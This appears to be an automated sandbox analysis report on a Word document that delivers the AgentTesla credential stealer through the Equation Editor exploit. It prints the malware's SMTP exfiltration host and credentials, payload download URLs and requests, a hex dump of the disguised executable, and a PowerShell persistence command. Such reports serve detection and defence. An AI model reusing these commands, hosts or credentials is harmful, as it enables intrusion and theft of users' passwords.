Loading ...

Play interactive tourEdit tour

Analysis Report RF_IMG_7510.doc

Overview

General Information

Sample Name:RF_IMG_7510.doc
Analysis ID:358285
MD5:0551c37e30c260db5280bf425158b5b9
SHA1:840c2cabdf7c0c31695e2b8ff9c4742f21555f65
SHA256:96703b50d7076b66dffce4f08ec5d1fca31f394b441bca2476eae3aaad6a6d50
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the startup folder
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2408 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2476 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • 69577.exe (PID: 2312 cmdline: C:\Users\Public\69577.exe MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
      • powershell.exe (PID: 2340 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Public\69577.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • 69577.exe (PID: 2700 cmdline: C:\Users\Public\69577.exe MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
  • Drivers.exe (PID: 2368 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
    • powershell.exe (PID: 2976 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • Drivers.exe (PID: 3024 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe MD5: 3A89CF2D6D2449EF1A9640AF29F3A782)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "Gi6ZhBE2T8YN", "URL: ": "http://ofpDdlcDvB.net", "To: ": "", "ByHost: ": "nobettwo.xyz:587", "Password: ": "VXwEltTnJ0xs", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2123950202.0000000000B10000.00000004.00000001.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
    0000000B.00000002.2344624346.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2344628029.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.69577.exe.3662378.8.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              8.2.Drivers.exe.b10000.2.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                8.2.Drivers.exe.3355d30.6.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                  4.2.69577.exe.3662378.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    8.2.Drivers.exe.32ef900.7.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2476, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2312
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 67.199.248.10, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2476, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2476, TargetFilename: C:\Users\Public\69577.exe
                      Sigma detected: Executables Started in Suspicious FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2476, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2312
                      Sigma detected: Execution in Non-Executable FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2476, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2312
                      Sigma detected: Suspicious Program Location Process StartsShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2476, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2312

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 69577.exe.2700.7.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "Gi6ZhBE2T8YN", "URL: ": "http://ofpDdlcDvB.net", "To: ": "", "ByHost: ": "nobettwo.xyz:587", "Password: ": "VXwEltTnJ0xs", "From: ": ""}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: RF_IMG_7510.docReversingLabs: Detection: 25%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RF_IMG_7510[1].jpgJoe Sandbox ML: detected
                      Source: C:\Users\Public\69577.exeJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: RunPE.pdb source: 69577.exe, 00000004.00000002.2090516277.0000000000270000.00000004.00000001.sdmp, Drivers.exe, 00000008.00000002.2125093142.0000000002281000.00000004.00000001.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098356463.0000000004E70000.00000002.00000001.sdmp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: bit.ly
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 198.54.126.101:587
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://ofpDdlcDvB.net
                      Connects to a URL shortener serviceShow sources
                      Source: unknownDNS query: name: bit.ly
                      Downloads files with wrong headers with respect to MIME Content-TypeShow sources
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Feb 2021 10:41:44 GMT Content-Type: image/jpeg Content-Length: 620032 Last-Modified: Thu, 25 Feb 2021 07:22:38 GMT Connection: keep-alive ETag: "6037503e-97600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fd 4a 37 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 06 00 00 e0 02 00 00 00 00 00 9e b2 06 00 00 20 00 00 00 c0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c b2 06 00 4f 00 00 00 00 c0 06 00 2e dd 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 92 06 00 00 20 00 00 00 94 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e dd 02 00 00 c0 06 00 00 de 02 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 09 00 00 02 00 00 00 74 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b2 06 00 00 00 00 00 48 00 00 00 02 00 05 00 74 93 06 00 d8 1e 00 00 03 00 00 00 16 00 00 06 1c 2d 00 00 56 66 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 00 7e 16 00 00 04 28 23 00 00 0a 26 2a 36 00 72 af 00 00 70 28 3f 00 00 0a 26 2a 0a 00 2a 86 00 02 04 6f 65 00 00 0a 7d 12 00 00 04 02 04 6f 66 00 00 0a 7d 13 00 00 04 02 17 7d 19 00 00 04 2a c2 28 1b 00 00 06 72 81 01 00 70 28 13 00 00 06 80 11 00 00 04 7e 1d 00 00 04 7e 11 00 00 04 6f 70 00 00 0a 6f 71 00 00 0a 16 9a 80 16 00 00 04 2a 42 02 28 72 00 00 0a 00 00 02 28 14 00 00 06 00 2a 2e 28 7d 00 00 0a 80 1d 00 00 04 2a 22 00 28 03 00 00 06 00 2a 26 02 28 72 00 00 0a 00 00 2a 22 00 02 80 1f 00 00 04 2a 22 02 28 82 00 00 0a 00 2a 56 73 1d 00 00 06 28 83 00 00 0a 74 07 00 00 02 80 20 00 00 04 2a 00 00 13 30 03 00 83 00 00 00 00 00 00 00 02 14 7d 0a 00 00 04 02 28 14 00 00 0a 00 00 02 28 0a 00 00 06 00 02 7b 0b 00 00 04 72 01 00 00 70 6f 15 00 00 0a 00 02 7b 0c 00 00 04 16 6f 16 00 00 0a 00 02 16 7d 06 00 00 04 02 73 17 00 00 0a 7d 09 00 00 04 02 16 28 18 00 00 0a 72 1b 00 00 70 28 19 00 00 0a 7d 07 00 00 04 02 7b 07 00 00 04 28 1a 00 00 0a 26 02 02 7b 07 00 00 04 28 1b 0
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.54.126.101:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Feb 2021 10:41:44 GMTContent-Type: image/jpegContent-Length: 620032Last-Modified: Thu, 25 Feb 2021 07:22:38 GMTConnection: keep-aliveETag: "6037503e-97600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fd 4a 37 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 06 00 00 e0 02 00 00 00 00 00 9e b2 06 00 00 20 00 00 00 c0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c b2 06 00 4f 00 00 00 00 c0 06 00 2e dd 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 92 06 00 00 20 00 00 00 94 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e dd 02 00 00 c0 06 00 00 de 02 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 09 00 00 02 00 00 00 74 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b2 06 00 00 00 00 00 48 00 00 00 02 00 05 00 74 93 06 00 d8 1e 00 00 03 00 00 00 16 00 00 06 1c 2d 00 00 56 66 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 00 7e 16 00 00 04 28 23 00 00 0a 26 2a 36 00 72 af 00 00 70 28 3f 00 00 0a 26 2a 0a 00 2a 86 00 02 04 6f 65 00 00 0a 7d 12 00 00 04 02 04 6f 66 00 00 0a 7d 13 00 00 04 02 17 7d 19 00 00 04 2a c2 28 1b 00 00 06 72 81 01 00 70 28 13 00 00 06 80 11 00 00 04 7e 1d 00 00 04 7e 11 00 00 04 6f 70 00 00 0a 6f 71 00 00 0a 16 9a 80 16 00 00 04 2a 42 02 28 72 00 00 0a 00 00 02 28 14 00 00 06 00 2a 2e 28 7d 00 00 0a 80 1d 00 00 04 2a 22 00 28 03 00 00 06 00 2a 26 02 28 72 00 00 0a 00 00 2a 22 00 02 80 1f 00 00 04 2a 22 02 28 82 00 00 0a 00 2a 56 73 1d 00 00 06 28 83 00 00 0a 74 07 00 00 02 80 20 00 00 04 2a 00 00 13 30 03 00 83 00 00 00 00 00 00 00 02 14 7d 0a 00 00 04 02 28 14 00 00 0a 00 00 02 28 0a 00 00 06 00 02 7b 0b 00 00 04 72 01 00 00 70 6f 15 00 00 0a 00 02 7b 0c 00 00 04 16 6f 16 00 00 0a 00 02 16 7d 06 00 00 04 02 73 17 00 00 0a 7d 09 00 00 04 02 16 28 18 00 00 0a 72 1b 00 00 70 28 19 00 00 0a 7d 07 00 00 04 02 7b 07 00 00 04 28 1a 00 00 0a 26 02 02 7b 07 00 00 0
                      Source: Joe Sandbox ViewIP Address: 67.199.248.10 67.199.248.10
                      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.54.126.101:587
                      Source: global trafficHTTP traffic detected: GET /2MrI2J8 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /I4/RF_IMG_7510.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: qadir.tickfa.ir
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43BDFCF0-FFD8-4816-B513-C2DC6937B540}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /2MrI2J8 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /I4/RF_IMG_7510.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: qadir.tickfa.ir
                      Source: powershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: bit.ly
                      Source: 69577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: 69577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: 69577.exe, 00000004.00000002.2091326557.0000000000CD0000.00000004.00000001.sdmp, Drivers.exe, 00000008.00000002.2123950202.0000000000B10000.00000004.00000001.sdmpString found in binary or memory: http://blog.naver.com/cubemit314Ghttp://projectofsonagi.tistory.com/
                      Source: powershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000009.00000002.2124110891.0000000000488000.00000004.00000020.sdmpString found in binary or memory: http://java.c
                      Source: powershell.exe, 00000005.00000002.2096404807.0000000002C77000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2127737379.0000000002C37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: powershell.exe, 00000005.00000002.2096404807.0000000002C77000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2127737379.0000000002C37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: 69577.exe, 00000007.00000002.2346066347.0000000002632000.00000004.00000001.sdmpString found in binary or memory: http://nobettwo.xyz
                      Source: 69577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmpString found in binary or memory: http://oVNzXy.com
                      Source: 69577.exe, 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmpString found in binary or memory: http://ofpDdlcDvB.net
                      Source: 69577.exe, 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmpString found in binary or memory: http://ofpDdlcDvB.nett;
                      Source: powershell.exe, 00000005.00000002.2092481447.00000000021B0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2348622133.0000000005B10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2096404807.0000000002C77000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2127737379.0000000002C37000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2096404807.0000000002C77000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2127737379.0000000002C37000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2092481447.00000000021B0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2348622133.0000000005B10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2096404807.0000000002C77000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2127737379.0000000002C37000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2095186940.0000000002A90000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000003.2087659071.00000000004F0000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.2121184838.000000000048C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000003.2087659071.00000000004F0000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.2121184838.000000000048C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: powershell.exe, 00000009.00000002.2127498758.0000000002A50000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: 69577.exe, 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: 69577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: 69577.exe, 00000004.00000002.2092160168.00000000034F9000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2344628029.0000000000402000.00000040.00000001.sdmp, Drivers.exe, 00000008.00000003.2116679901.00000000006D0000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: 69577.exe, 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 7.2.69577.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b95EC5122u002d85F8u002d43C0u002dA23Cu002dECB5DF736034u007d/u0038C9B8A3Bu002dB896u002d4DE2u002d8710u002dC7B93EE43B1B.csLarge array initialization: .cctor: array initializer size 11952
                      Source: 11.2.Drivers.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b95EC5122u002d85F8u002d43C0u002dA23Cu002dECB5DF736034u007d/u0038C9B8A3Bu002dB896u002d4DE2u002d8710u002dC7B93EE43B1B.csLarge array initialization: .cctor: array initializer size 11952
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RF_IMG_7510[1].jpgJump to dropped file
